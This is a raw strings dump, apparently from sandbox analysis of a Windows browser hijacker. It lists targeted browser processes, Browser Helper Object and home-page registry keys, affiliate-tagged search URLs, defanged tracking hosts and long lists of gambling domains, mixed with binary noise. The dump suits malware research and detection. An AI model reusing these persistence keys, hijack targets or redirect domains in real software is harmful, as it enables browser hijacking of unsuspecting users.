ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
Vh(%C
Uh
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFilel3C
OnGetPassword
EIdOSSLLoadingRootCertError8?C
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP`
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse(
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
TIdHTTP$
HTTPOptions\
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
KERNEL32.DLL
TIdUDPBase
TIdUDPBasep?D
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Ínor%xom
Ínor%o|od~
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
b~~z0%%id}r$?2kn$idÍnor%mo~ilm5cn7
8$:$:$=:
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
yV.HR
nsSHD
.DqWw
KQ%C/
A}%xY;
DI.db
SqLk
~T]%D
Q.DJB4@J
jn%F&
C.sT!
.kYTRQ
k/[%fU
C'.fE
f!
%s)U$
b.Mvj
vc%cJ<
<=][/[>\
O.HM6=
.hX%K
R.lg)
vN.dq
_òJ
OR.pN
%saWo
dWW%f
;ûcH.
B.PFK
7?3/P%S
d/.Zh
%s#]&&,
W.die
5x.cH
 .Ow?
.vjBFbNo
`W.XO~
F.Ve\
".RFjS
'p%S(
[email protected]
--s}f
_} B.ey
h\.nT`M
t:\8>
%Ct^"
.xbztY]!/.
.bKq&
3.TY]
.EWgzJV
Q.gDYC
A.=%SpY
'Z.JRw
5t.je
I,.wF
.kPAf}
B^y.Eh
.wpa}
%sB/Q
'.DE:C
.gnff
u9Q%SH
K.ZKD{
-%xH$U
 ,.HZ
Dx.Hqz
G4%U\
Q%xuk
n]-qOYW}
..œ
'k.wY,
{z',%u%
N.bsR
}Dc.sN
 .ox\
h%cY[
?456789:;<=
!"#$%&'()* ,-./0123
%WinDir%\CLOG.txt
2016-09-22
21:37:12
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetCPInfo
MsgWaitForMultipleObjects
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
netapi32.dll
wsock32.dll
ADVAPI32.DLL
ntdll.dll
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
urlmon.dll
rpcrt4.dll
<requestedExecutionLevel level="requireAdministrator"/>
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Ancestor for '%s' not found
Cannot assign a %s to a %sECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

%original file name%.exe_2044_rwx_00532000_00002000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
oleaut32.dll
urlmon.dll
shell32.dll
netapi32.dll
wsock32.dll
ntdll.dll
rpcrt4.dll
GetKeyboardType
RegOpenKeyExA
UrlMkGetSessionOption
<requestedExecutionLevel level="requireAdministrator"/>

%original file name%.exe_2044_rwx_00FB0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

%original file name%.exe_2044_rwx_01751000_0017F000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
PSAPI.dll
ole32.dll
Uh%Dw
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
Uh%Sx
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPort
OnExecute
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile,
CertFile,
KeyFile\
OnGetPassword
EIdOSSLLoadingRootCertError(
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTPP
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptionsL
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx
WindowState
OnKeyDown
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserAppX
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowser
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop
OnWindowSetWidth`
OnWindowSetHeight
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizable@
OnWindowSetWidth,
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
1.2.8
TIdUDPBase
TIdUDPBasex
IdUDPBase
255.255.255.255
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
IdUDPServer
DefaultPorth
OnUDPRead
TIdUDPClient
IdUDPClient
Port<
"TProcess_WinProc_WinHWND_Operating
TMyCheckHttpRedirectUrl
TMyBrowserCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
Ínor%xom
baidu.3v32.com
.qq.com/
Ínor%o|od~
Ínor%nk~k
hXXp://sky.5636.com/1.1/dtapi
%s [%8X][%d]
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
.dll, RunIt
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
dllhost.exe
svchost.exe
*.dll
684EF56E-2FAE-4ed2-BF46-F0440C5BE24F
{60853F8B-2218-49CF-A58D-2561B9550406}
explorer.exe
ids.exe
GameLogin\
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
hXXp://VVV.m9x1.com/so11?nid=1
http:
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
8:;9$8$;$;
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
YY.exe
qqbrowser.exe
Juzi.exe
2345chrome.exe
twchrome.exe
opera.exe
115Chrome.exe
Ruiying.exe
SaaYaa.exe
LolClient.exe
ADSafeSe.exe
b~~z0%%}}}$~b;o:$ieg%ss
b~~z0%%}}}$~b;o:$iegþf
WP....OK
WP....ERROR
UrlAD:
VVV.baidu.com/s?
Get url Err...
Windows NT\Accessories\
acLuaua.dll
HintSock.dll
sogou.com
VVV.sogou.com/index.htm?pid=
{D878EB20-C55A-4402-8B25-6387D34F10CB}
{4958F3A2-1032-49af-8BDC-FA4C0C0931ED}
{77EEBB61-8868-4FA1-8A9D-AB54F43C7D92}
{992B79F3-7E84-4C58-AD30-0B72034EC192}
{AF9143FF-D8F3-4ACE-B736-4757B5918388}
{E58EE67D-E279-4C21-B87C-E9DCC9EA6F1F}
{8605FF4E-830B-4E07-A811-FDB48E8BF0BB}
{00000000-0593-4356-9CF7-1D8C2B3343C0}
{452700E0-9F72-421E-8ACC-1948A30751BD}
{505D8605-AB58-4243-8BA0-D7FE50A79698}
{19F620A5-6106-453A-856D-D66E967C45D8}
{F7AD480D-C4A9-4816-96B0-49620E1C1141}
{9D03EDFD-BB04-4E90-AFEA-42B84C6E2141}
{BC10E8CB-3CFA-4F61-A5E1-846506D33FAF}
{7390f3d8-0439-4c05-91e3-cf5cb290c3d0}
{77FEF28E-EB96-44FF-B511-3185DEA48697}
{6E28339B-7C6E-47B6-AEB2-46BA53782379}
{02AC20DD-5548-4CA7-ACCF-18AFE5A4A072}
{3C696E52-BF38-49A8-9017-ACE15A794707}
{4D8CE2EB-5AC8-47F9-8103-3A8AC5B868DF}
{29CF293A-1E7D-4069-9E11-E39698D0AF95}
Software\Microsoft\Internet Explorer\TypedURLs
-AAB6-4EFB-8BD1-
CDCLOG.txt
VVV.sun0769.com
VVV.hg6288.com
2.0.1.17
RestoreTCP
FastIE.exe
2345Explorer.exe
7chrome.exe
liebao.exe
TaoBrowser.exe
baidubrowser.exe
TheWorld.exe
Firefox.exe
Maxthon.exe
350chrome.exe
ttraveler.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
cn.hao123.com
0.baidu.com
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
hXXps://VVV.baidu.com/s?word={searchTerms}&tn=
123.sogou.com/?
hXXps://VVV.sogou.com/sie?
VVV.sogou.com
msdialg100_D.dll
DIC...WAE
BarClient.exe
BarClientView.exe
b~~z0%%}}}$bkeye
HintClient.exe
hXXp://VVV.km5n.com/16?nid=1
Seflow64.pdb;doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
BACK.pdb;goodtdi.pdb;
b~~z0%þhhs$mi=9$ieg
b~~z0%%xoieggodn$r
*VVV.tyc[0-9].com*
*VVV.tyc[0-9][0-9].com*
*tyc[0-9][0-9][0-9].com*
*tyc[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]tyc.com*
*VVV.[0-9][0-9]tyc.com*
*[0-9][0-9][0-9]tyc.com*
*[0-9][0-9][0-9][0-9]tyc.com*
*VVV.sun[0-9].com*
*VVV.sun[0-9][0-9].com*
*sun[0-9][0-9][0-9].com*
*sun[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]sun.com*
*VVV.[0-9][0-9]sun.com*
*[0-9][0-9][0-9]sun.com*
*[0-9][0-9][0-9][0-9]sun.com*
*VVV.sb[0-9].com*
*VVV.sb[0-9][0-9].com*
*sb[0-9][0-9][0-9].com*
*sb[0-9][0-9][0-9][0-9].com*
*VVV.[0-9][0-9]sb.com*
*VVV.[0-9][0-9][0-9]sb.com*
*[0-9][0-9][0-9][0-9]sb.com*
*VVV.hg[0-9][0-9].com
*VVV.hg[0-9][0-9][0-9].com
*hg[0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.ra[0-9].com*
*VVV.ra[0-9][0-9].com*
*VVV.ra[0-9][0-9][0-9].com*
*ra[0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.xpj[0-9][0-9].com*
*xpj[0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9][0-9].com*
üda%
netbar.6-6.cn
VVV.baiduso.com
baiduso.com
42.62.30.180
dwz.cn
VVV.9973.com
61.160.250.4
VVV.msn.com
msn.com
index.114wb.net
114wb.net
123.yhkj9.com
yhkj9.com
index.58toto.com
58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
apyw.net
VVV.aiwbnet.net
aiwbnet.net
VVV.yaojyw.net
yaojyw.net
VVV.gt18z.com
gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
icafevip.com
www1.7899987.com
7899987.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
VVV.369k.net
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
wb.soso.com
sogoulp.com
123.5in8.com
hao.5in8.com
VVV.5334.com
42.62.30.180/
dwz.cn/OXHad
web.sogou.com/?
VVV.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
cn.hao123.com/?tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?src=
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
//index.woai310.com/index.htm?
VVV.sogou58.com/31077
VVV.tao123.com
VVV.dh18.com
456.huo99.com
huo99.com
hao123.cdsoso.net
VVV.2345.com
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
wb.soso.com/?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.mhkfc.net
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.2345.com/?
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\dnsset
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\ZWebNds
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\stans
wxpro.dll
Busiwork.dll
swaddresbar.dll
loguser.dll
WxVSafe.dll
lolhelper.dll
wxcore.dll
rmserver.exe
exploren.exe
services.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
conhost.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
ADMon.exe
Chrom.exe
csrss.exe
hXXps://123.sogou.com/?71163-0897
71163-0897
qiangui666.com
yuebet188.com
hao555666.com
pp88086.com
ay159.com
860923.top
85850z.com
VVV.665252.com
nbboard.com
heshangmeng.net
s88ab.com
qy8100.com
VVV.bb868.com
VVV.bo7727.com
2130.qg790.com
bwin2020.com
vic76.com
jiuwuzhizun11.com
95zz00.com
jwzzgw4.cc
882828.net
jjxieqiaoxx.com
9599333.com
VVV.565.net
yuefabo.com
ylg6266.com
VVV.mf9999.com
VVV.yh478.net
29salon.com
VVV.478001.com
478vip.com
VVV.48111.com
my63303.com
VVV.88928.com
VVV.21222.com
bogou888.com
VVV.31999.com
tycjt1.com
long772.com
VVV.63365.com
VVV.656995.com
VVV.3505.com
VVV.2138s.com
jin3388.com
xam31999.com
ty1299.com
VVV.145a.com
www-57365.com
VVV.880ms.com
555050.com
ylg2299.com
886868.net
59bo.cc
dh5524.com
95996666.net
VVV.0008.com
xinyu588.com
VVV.8-88d.com
9000402.com
moca777.com
VVV.itb88.com
yo86567.com
111f11.com
www-23456.com
jwzzgw.cc
jiuwuzhizun11.cc
tbbet8888.com
VVV.zr88a.cc
aygj77.com
VVV.s138x.com
js00697.com
qwe654.com
VVV.aygj5.com
aoyayule.com
VVV.ay741.com
yo84756.com
haomatang.com
2221402.com
vns255.com
VVV.x6168.com
shangshangchuanmei.com
k178.vcevv.cn
weebly.com
gdzfcn.com
tbfastfast888.com
ty443.com
js9980.com
VVV.shhbm.com
wns707.com
VVV.7999.cc
ylg2099.com
86666.8994.com
aoya113.com
fa97463.com
VVV.ay951.com
VVV.farmer.com.cn
score.365rich.cn
VVV.8ff77.com
0316ga.com
600.cc
VVV.88jt.net
dafabet.com
VVV.ccav5.com
arsenal.com.cn
VVV.2246.com
88jt88.com
28365365.com
VVV.7m.cn
VVV.9599qq.com
VVV.9599aa.com
VVV.yl8886.com
bwin0055.com
yzc178.com
VVV.ca88.com
wofacai.com
jiuwuzhizun6.cc
uu11.cc
1p111.com
jwzzgw2.com
VVV.88jt.cc
95zz44.com
df011.com
95990777.net
anyaoying.com
2p222.com
95zz88.com
dafa888.asia
jiuwuzhizun6.com
95zz08.com
517888.net
95992828.cc
VVV.jxhu.com
VVV.cmp8.com
VVV.9178b.com
bbs.long8.cc
VVV.b1888.cc
95992828.net
biz5.sandai.net
VVV.tycyyy.com
ylg8838.com
yzc363.com
chunv55.com
VVV.9177b.com
yusheedu.com
dafa888.com
VVV.hllzsxa.com
dy7777.com
VVV.6625ss.com
xiudu868.com
95995858.cc
95998888.cc
xin1946.com
qiangui678.com
jwzzgw6.com
95zz11.com
885858.cc
yz188.com
VVV.hfyj.net
VVV.91ent.com
ad.148021.com
yzc262.com
95993838.cc
VVV.ca881.com
5555.ht
VVV.58js.com
VVV.aobo8.net
VVV.b138.cc
VVV.cr1118.com
VVV.df888.com
VVV.dfbet.com
VVV.dfbet.net
VVV.y8.cc
VVV.y9.cc
VVV.yxlm.cc
VVV.tyc.com
VVV.vn66.com
VVV.w88.com
VVV.wofacai.com
hgbet222.com
VVV.m99.com
VVV.mg.cc
dafa888.cm
gcgc915.com
hailifang.com
hg0088.com.so
hg0088.net
hga8800.com
hgw025.com
jsc9988.com
s8s.cc
5060001.com
2055aaa.com
VVV.m402.com
VVV.660022.com
95990044.cc
1bet999.com
ad.050122.com
88jt03.com
VVV.9599gg.com
1006163.com
VVV.df011.com
dy8811.com
px0311.com
9911tyc.com
ty442.com
amws1199.com
yrmt168.com
jwzzgw6.cc
0006163.com
VVV.ay017.com
88jt33.net
zuijiabo.com
VVV.y9.tt
95993838.net
VVV.s138y.com
dafa91.cn
tongbo8888.com
51taotaoyou.com
VVV.ll-49.com
vip1922.com
050ab29.com
9882011.com
w88wap.com
63bdg.com
47.89.30.97
5345yy.com
yzc1188.com
